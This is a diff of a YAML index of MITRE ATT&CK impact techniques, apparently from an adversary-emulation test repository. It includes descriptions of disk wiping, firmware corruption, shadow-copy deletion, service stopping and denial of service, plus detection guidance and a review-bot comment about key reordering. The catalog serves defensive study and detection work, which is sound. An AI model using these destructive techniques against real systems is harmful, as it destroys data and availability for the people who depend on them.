+ Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
+
+ To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
+ name: Disk Content Wipe
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1561.001
@@ -33754,23 +34742,6 @@ impact:
description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved
December 13, 2017.
source_name: Microsoft Sysmon v6 May 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Disk Content Wipe
- description: |-
- Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
-
- Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
-
- To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
- id: attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- modified: '2020-03-28T22:53:20.162Z'
- created: '2020-02-20T22:06:41.739Z'
x_mitre_platforms:
- Linux
- macOS
@@ -33856,27 +34827,27 @@ impact:
phase_name: impact
modified: '2020-03-28T23:00:00.367Z'
created: '2020-02-20T22:10:20.484Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Kernel drivers
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: 'Look for attempts to read/write to sensitive locations like
- the master boot record and the disk partition table. Monitor for direct access
- read/write attempts using the \\\\.\\ notation.(Citation: Microsoft
- Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.'
- x_mitre_impact_type:
- - Availability
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: 'Look for attempts to read/write to sensitive locations like
+ the master boot record and the disk partition table. Monitor for direct access
+ read/write attempts using the \\\\.\\ notation.(Citation: Microsoft
+ Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.'
+ x_mitre_data_sources:
+ - Kernel drivers
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1561:
technique:
@@ -33907,28 +34878,28 @@ impact:
phase_name: impact
modified: '2020-03-28T23:00:00.599Z'
created: '2020-02-20T22:02:20.372Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Kernel drivers
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: 'Look for attempts to read/write to sensitive locations like
- the partition boot sector, master boot record, disk partition table, or BIOS
- parameter block/superblock. Monitor for direct access read/write attempts
- using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May
- 2017) Monitor for unusual kernel driver installation activity.'
- x_mitre_impact_type:
- - Availability
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
- root
- SYSTEM
- Administrator
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: 'Look for attempts to read/write to sensitive locations like
+ the partition boot sector, master boot record, disk partition table, or BIOS
+ parameter block/superblock. Monitor for direct access read/write attempts
+ using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May
+ 2017) Monitor for unusual kernel driver installation activity.'
+ x_mitre_data_sources:
+ - Kernel drivers
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1499:
technique:
@@ -33999,17 +34970,13 @@ impact:
phase_name: impact
modified: '2020-03-29T02:07:27.676Z'
created: '2019-04-18T11:00:55.862Z'
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Web logs
- - Web application firewall logs
- - Network intrusion detection system
- - Network protocol analysis
- - Network device logs
- - Netflow/Enclave netflow
- x_mitre_version: '1.0'
- x_mitre_impact_type:
- - Availability
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
+
+ In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+
+ Externally monitor the availability of services that may be targeted by an Endpoint DoS.
x_mitre_platforms:
- Linux
- macOS
@@ -34020,13 +34987,17 @@ impact:
- Office 365
- Azure AD
- SaaS
- x_mitre_detection: |-
- Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
-
- In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
-
- Externally monitor the availability of services that may be targeted by an Endpoint DoS.
- x_mitre_is_subtechnique: false
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Web logs
+ - Web application firewall logs
+ - Network intrusion detection system
+ - Network protocol analysis
+ - Network device logs
+ - Netflow/Enclave netflow
atomic_tests: []
T1491.002:
technique:
@@ -34071,8 +35042,21 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-28T22:35:27.602Z'
+ modified: '2020-04-22T15:19:31.380Z'
created: '2020-02-20T14:34:08.496Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Integrity
+ x_mitre_detection: Monitor external websites for unplanned content changes.
+ Monitor application logs for abnormal behavior that may indicate attempted
+ or successful exploitation. Use deep packet inspection to look for artifacts
+ of common exploit traffic, such as SQL injection. Web Application Firewalls
+ may detect improper inputs attempting exploitation.
+ x_mitre_data_sources:
+ - Web logs
+ - Web application firewall logs
+ - Packet capture
x_mitre_platforms:
- Linux
- macOS
@@ -34080,22 +35064,20 @@ impact:
- AWS
- GCP
- Azure
- x_mitre_data_sources:
- - Web logs
- - Web application firewall logs
- - Packet capture
- x_mitre_detection: Monitor external websites for unplanned content changes.
- Monitor application logs for abnormal behavior that may indicate attempted
- or successful exploitation. Use deep packet inspection to look for artifacts
- of common exploit traffic, such as SQL injection. Web Application Firewalls
- may detect improper inputs attempting exploitation.
- x_mitre_impact_type:
- - Integrity
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1495:
technique:
+ id: attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89
+ description: 'Adversaries may overwrite or corrupt the flash memory contents
+ of system BIOS or other firmware in devices attached to a system in order
+ to render them inoperable or unable to boot.(Citation: Symantec Chernobyl
+ W95.CIH) Firmware is software that is loaded and executed from non-volatile
+ memory on hardware devices in order to initialize and manage device functionality.
+ These devices could include the motherboard, hard drive, or video cards.'
+ name: Firmware Corruption
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- external_id: T1495
source_name: mitre-attack
@@ -34107,23 +35089,13 @@ impact:
description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE
Firmware Security Research. Retrieved January 5, 2016.
source_name: MITRE Trustworthy Firmware Measurement
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Firmware Corruption
- description: 'Adversaries may overwrite or corrupt the flash memory contents
- of system BIOS or other firmware in devices attached to a system in order
- to render them inoperable or unable to boot.(Citation: Symantec Chernobyl
- W95.CIH) Firmware is software that is loaded and executed from non-volatile
- memory on hardware devices in order to initialize and manage device functionality.
- These devices could include the motherboard, hard drive, or video cards.'
- id: attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-07-17T21:23:45.464Z'
+ modified: '2020-07-14T19:31:46.550Z'
created: '2019-04-12T18:28:15.451Z'
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
@@ -34174,32 +35146,33 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-07-19T14:37:37.347Z'
+ modified: '2020-07-14T19:33:52.512Z'
created: '2019-04-02T13:54:43.136Z'
- x_mitre_contributors:
- - Yonatan Gotlib, Deep Instinct
- x_mitre_impact_type:
- - Availability
- x_mitre_detection: |-
- Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
-
- Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage).
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_permissions_required:
+ - Administrator
+ - root
+ - SYSTEM
+ - User
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- Windows Registry
- Services
- Windows event logs
- Process command-line parameters
- Process monitoring
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - Administrator
- - root
- - SYSTEM
- - User
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
+ x_mitre_detection: |-
+ Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
+
+ Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage).
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_contributors:
+ - Yonatan Gotlib, Deep Instinct
identifier: T1490
atomic_tests:
- name: Windows - Delete Volume Shadow Copies
@@ -34332,23 +35305,23 @@ impact:
phase_name: impact
modified: '2020-03-29T22:57:04.784Z'
created: '2020-02-20T14:31:34.778Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Web logs
- - Web application firewall logs
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Integrity
x_mitre_detection: Monitor internal and websites for unplanned content changes.
Monitor application logs for abnormal behavior that may indicate attempted
or successful exploitation. Use deep packet inspection to look for artifacts
of common exploit traffic, such as SQL injection. Web Application Firewalls
may detect improper inputs attempting exploitation.
- x_mitre_impact_type:
- - Integrity
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Web logs
+ - Web application firewall logs
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1498:
technique:
@@ -34395,25 +35368,7 @@ impact:
phase_name: impact
modified: '2020-03-29T01:11:28.903Z'
created: '2019-04-17T20:23:15.105Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure AD
- - SaaS
- - Azure
- - Office 365
- x_mitre_impact_type:
- - Availability
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Sensor health and status
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Network intrusion detection system
- - Network device logs
+ x_mitre_is_subtechnique: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -34426,7 +35381,25 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Sensor health and status
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Network intrusion detection system
+ - Network device logs
+ x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure AD
+ - SaaS
+ - Azure
+ - Office 365
atomic_tests: []
T1499.001:
technique:
@@ -34469,15 +35442,10 @@ impact:
phase_name: impact
modified: '2020-03-29T01:43:29.320Z'
created: '2020-02-20T15:27:18.581Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Network device logs
- - Netflow/Enclave netflow
- - Network intrusion detection system
- - SSL/TLS inspection
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
x_mitre_detection: 'Detection of Endpoint DoS can sometimes be achieved before
the effect is sufficient to cause significant impact to the availability of
the service, but such response time typically requires very aggressive monitoring
@@ -34486,10 +35454,15 @@ impact:
utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative
study of the network traffic can identify a sudden surge in one type of protocol
can be used to detect an attack as it starts.'
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Network device logs
+ - Netflow/Enclave netflow
+ - Network intrusion detection system
+ - SSL/TLS inspection
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1498.002:
technique:
@@ -34538,20 +35511,12 @@ impact:
phase_name: impact
modified: '2020-03-23T12:55:30.119Z'
created: '2020-03-02T20:08:03.691Z'
- x_mitre_platforms:
- - macOS
- - Windows
- - Linux
- - AWS
- - Office 365
- - Azure AD
- - GCP
- - Azure
- - SaaS
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Sensor health and status
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Network intrusion detection system
+ - Network device logs
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -34564,12 +35529,20 @@ impact:
the lead time may be small and the indicator of an event availability of the
network or service drops. The analysis tools mentioned can then be used to
determine the type of DoS causing the outage and help with remediation.'
- x_mitre_data_sources:
- - Sensor health and status
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Network intrusion detection system
- - Network device logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_platforms:
+ - macOS
+ - Windows
+ - Linux
+ - AWS
+ - Office 365
+ - Azure AD
+ - GCP
+ - Azure
+ - SaaS
atomic_tests: []
T1496:
technique:
@@ -34604,14 +35577,22 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-10-10T18:40:46.985Z'
+ modified: '2020-07-14T19:29:17.574Z'
created: '2019-04-17T14:50:05.682Z'
- x_mitre_detection: Consider monitoring process resource usage to determine anomalous
- activity associated with malicious hijacking of computer resources such as
- CPU, memory, and graphics processing resources. Monitor for suspicious use
- of network resources associated with cryptocurrency mining software. Monitor
- for common cryptomining software process names and files on local systems
- that may indicate compromise and resource usage.
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- Azure activity logs
- Stackdriver logs
@@ -34620,19 +35601,12 @@ impact:
- Process monitoring
- Network protocol analysis
- Network device logs
- x_mitre_version: '1.1'
- x_mitre_impact_type:
- - Availability
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure
+ x_mitre_detection: Consider monitoring process resource usage to determine anomalous
+ activity associated with malicious hijacking of computer resources such as
+ CPU, memory, and graphics processing resources. Monitor for suspicious use
+ of network resources associated with cryptocurrency mining software. Monitor
+ for common cryptomining software process names and files on local systems
+ that may indicate compromise and resource usage.
identifier: T1496
atomic_tests:
- name: macOS/Linux - Simulate CPU Load with Yes
@@ -34650,6 +35624,21 @@ impact:
name: bash
T1565.003:
technique:
+ created: '2020-03-02T14:30:05.252Z'
+ modified: '2020-03-28T23:10:34.359Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ description: |-
+ Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ name: Runtime Data Manipulation
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1565.003
@@ -34662,21 +35651,6 @@ impact:
url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Runtime Data Manipulation
- description: |-
- Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Adversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- modified: '2020-03-28T23:10:34.359Z'
- created: '2020-03-02T14:30:05.252Z'
x_mitre_platforms:
- Linux
- macOS
@@ -34737,6 +35711,23 @@ impact:
phase_name: impact
modified: '2020-03-29T01:52:53.947Z'
created: '2020-02-20T15:31:43.613Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: |-
+ Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
+
+ In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+
+ Externally monitor the availability of services that may be targeted by an Endpoint DoS.
+ x_mitre_data_sources:
+ - Netflow/Enclave netflow
+ - Network device logs
+ - Network intrusion detection system
+ - Web application firewall logs
+ - Web logs
+ - SSL/TLS inspection
x_mitre_platforms:
- Linux
- macOS
@@ -34747,26 +35738,28 @@ impact:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - Netflow/Enclave netflow
- - Network device logs
- - Network intrusion detection system
- - Web application firewall logs
- - Web logs
- - SSL/TLS inspection
- x_mitre_detection: |-
- Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
-
- In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
-
- Externally monitor the availability of services that may be targeted by an Endpoint DoS.
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1489:
technique:
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ description: "Adversaries may stop or disable services on a system to render
+ those services unavailable to legitimate users. Stopping critical services
+ can inhibit or stop response to an incident or aid in the adversary's overall
+ objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer
+ 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by
+ disabling individual services of high importance to an organization, such
+ as MSExchangeIS, which will make Exchange content inaccessible
+ (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
+ many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ 2018) Services may not allow for modification of their data stores while running.
+ Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485)
+ or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)
+ on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks
+ WannaCry Analysis)"
+ name: Service Stop
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- external_id: T1489
source_name: mitre-attack
@@ -34784,31 +35777,13 @@ impact:
url: https://www.secureworks.com/research/wcry-ransomware-analysis
description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
Analysis. Retrieved March 26, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
- description: "Adversaries may stop or disable services on a system to render
- those services unavailable to legitimate users. Stopping critical services
- can inhibit or stop response to an incident or aid in the adversary's overall
- objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer
- 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by
- disabling individual services of high importance to an organization, such
- as MSExchangeIS, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
- 2018) Services may not allow for modification of their data stores while running.
- Adversaries may stop services in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485)
- or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486)
- on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks
- WannaCry Analysis)"
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-07-18T19:18:32.674Z'
+ modified: '2020-07-14T19:34:47.636Z'
created: '2019-03-29T19:00:55.901Z'
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
x_mitre_permissions_required:
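Review bot: Almost every line in this hunk is a pure key reorder (`x_mitre_platforms`, `x_mitre_version`, `x_mitre_is_subtechnique` and the `id`/`description`/`name` block all move without changing value), and the same pattern repeats in the T1529, T1087, T1010, T1217, T1538, T1526, T1482 and T1083 hunks below, so the substantive changes here (the `modified` bump to `2020-07-14T19:34:47.636Z` and the new `x_mitre_is_subtechnique: false`) are hard to pick out. YAML mapping order carries no meaning for consumers, so the churn buys nothing and makes future diffs of this index equally noisy. The generator that writes this file is not visible in the diff; if it dumps with PyYAML, emitting with `sort_keys=True` (or another fixed key order applied to both the technique mapping and each `external_references` entry, whose `source_name`/`external_id` order also flips in the T1526 hunk) would make regeneration deterministic and keep diffs limited to real data changes. The enclosing `T1489` mapping starts in the previous hunk and continues past this one.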
@@ -34925,24 +35900,24 @@ impact:
phase_name: impact
modified: '2020-03-02T15:17:40.505Z'
created: '2020-03-02T14:22:24.410Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - File monitoring
- - Application logs
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- x_mitre_impact_type:
- - Integrity
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Integrity
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_data_sources:
+ - File monitoring
+ - Application logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1529:
technique:
@@ -34977,27 +35952,27 @@ impact:
phase_name: impact
modified: '2020-03-27T21:18:48.149Z'
created: '2019-10-04T20:42:28.541Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: Use process monitoring to monitor the execution and command
+ line parameters of binaries involved in shutting down or rebooting systems.
+ Windows event logs may also designate activity associated with a shutdown/reboot,
+ ex. Event ID 1074 and 6006.
+ x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_impact_type:
- - Availability
- x_mitre_version: '1.0'
- x_mitre_detection: Use process monitoring to monitor the execution and command
- line parameters of binaries involved in shutting down or rebooting systems.
- Windows event logs may also designate activity associated with a shutdown/reboot,
- ex. Event ID 1074 and 6006.
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1529
atomic_tests:
- name: Shutdown System - Windows
@@ -35169,28 +36144,28 @@ impact:
phase_name: impact
modified: '2020-03-02T15:20:28.455Z'
created: '2020-03-02T14:27:00.693Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Network protocol analysis
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ - root
+ x_mitre_impact_type:
+ - Integrity
x_mitre_detection: 'Detecting the manipulation of data as at passes over a network
